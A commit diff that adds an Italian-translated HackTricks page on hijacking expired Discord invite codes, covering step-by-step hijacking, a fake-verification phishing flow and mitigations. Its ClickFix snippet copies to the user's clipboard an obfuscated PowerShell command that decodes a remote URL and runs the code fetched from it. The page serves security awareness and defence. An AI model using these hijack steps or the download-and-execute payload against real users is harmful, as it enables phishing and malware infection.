Translated ['src/generic-methodologies-and-resources/phishing-methodolog

src/SUMMARY.md

@@ -29,6 +29,7 @@
 - [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md)
   - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
   - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
+  - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
   - [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
 - [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
   - [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)

src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md

@@ -0,0 +1,61 @@
+# Discord Invite Hijacking
+
+{{#include ../../banners/hacktricks-training.md}}
+
+La vulnerabilità del sistema di inviti di Discord consente agli attori delle minacce di rivendicare codici di invito scaduti o eliminati (temporanei, permanenti o personalizzati) come nuovi link vanity su qualsiasi server potenziato di Livello 3. Normalizzando tutti i codici in minuscolo, gli attaccanti possono preregistrare codici di invito noti e dirottare silenziosamente il traffico una volta che il link originale scade o il server sorgente perde il suo potenziamento.
+
+## Tipi di Inviti e Rischio di Dirottamento
+
+| Tipo di Invito        | Dirottabile? | Condizione / Commenti                                                                                       |
+|-----------------------|--------------|------------------------------------------------------------------------------------------------------------|
+| Link di Invito Temporaneo | ✅          | Dopo la scadenza, il codice diventa disponibile e può essere nuovamente registrato come URL vanity da un server potenziato. |
+| Link di Invito Permanente | ⚠️          | Se eliminato e composto solo da lettere minuscole e cifre, il codice potrebbe diventare nuovamente disponibile.        |
+| Link Vanity Personalizzato | ✅          | Se il server originale perde il suo Potenziamento di Livello 3, il suo invito vanity diventa disponibile per una nuova registrazione.    |
+
+## Passi di Sfruttamento
+
+1. Ricognizione
+- Monitorare fonti pubbliche (forum, social media, canali Telegram) per link di invito che corrispondono al modello `discord.gg/{code}` o `discord.com/invite/{code}`.
+- Raccogliere codici di invito di interesse (temporanei o vanity).
+2. Preregistrazione
+- Creare o utilizzare un server Discord esistente con privilegi di Potenziamento di Livello 3.
+- In **Impostazioni Server → URL Vanity**, tentare di assegnare il codice di invito target. Se accettato, il codice è riservato dal server malevolo.
+3. Attivazione del Dirottamento
+- Per inviti temporanei, attendere che l'invito originale scada (o eliminarlo manualmente se controlli la sorgente).
+- Per codici contenenti lettere maiuscole, la variante minuscola può essere rivendicata immediatamente, anche se il reindirizzamento si attiva solo dopo la scadenza.
+4. Reindirizzamento Silenzioso
+- Gli utenti che visitano il vecchio link vengono inviati senza problemi al server controllato dall'attaccante una volta che il dirottamento è attivo.
+
+## Flusso di Phishing tramite Server Discord
+
+1. Limitare i canali del server in modo che sia visibile solo un canale **#verify**.
+2. Distribuire un bot (ad es., **Safeguard#0786**) per invitare i nuovi arrivati a verificarsi tramite OAuth2.
+3. Il bot reindirizza gli utenti a un sito di phishing (ad es., `captchaguard.me`) sotto le spoglie di un passaggio CAPTCHA o di verifica.
+4. Implementare il trucco UX **ClickFix**:
+- Visualizzare un messaggio CAPTCHA rotto.
+- Guidare gli utenti ad aprire la finestra di dialogo **Win+R**, incollare un comando PowerShell precaricato e premere Invio.
+
+### Esempio di Iniezione negli Appunti ClickFix
+```javascript
+// Copy malicious PowerShell command to clipboard
+const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
+`$u=($r[-1..-($r.Length)]-join '');` +
+`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
+`iex (iwr -Uri $url)"`;
+navigator.clipboard.writeText(cmd);
+```
+Questo approccio evita download diretti di file e sfrutta elementi UI familiari per ridurre il sospetto degli utenti.
+
+## Mitigazioni
+
+- Utilizzare link di invito permanenti contenenti almeno una lettera maiuscola o un carattere non alfanumerico (mai scadere, non riutilizzabili).
+- Ruotare regolarmente i codici di invito e revocare i link vecchi.
+- Monitorare lo stato del potenziamento del server Discord e le rivendicazioni degli URL vanity.
+- Educare gli utenti a verificare l'autenticità del server e a evitare di eseguire comandi incollati dagli appunti.
+
+## Riferimenti
+
+- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
+- Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
+
+{{#include /banners/hacktricks-training.md}}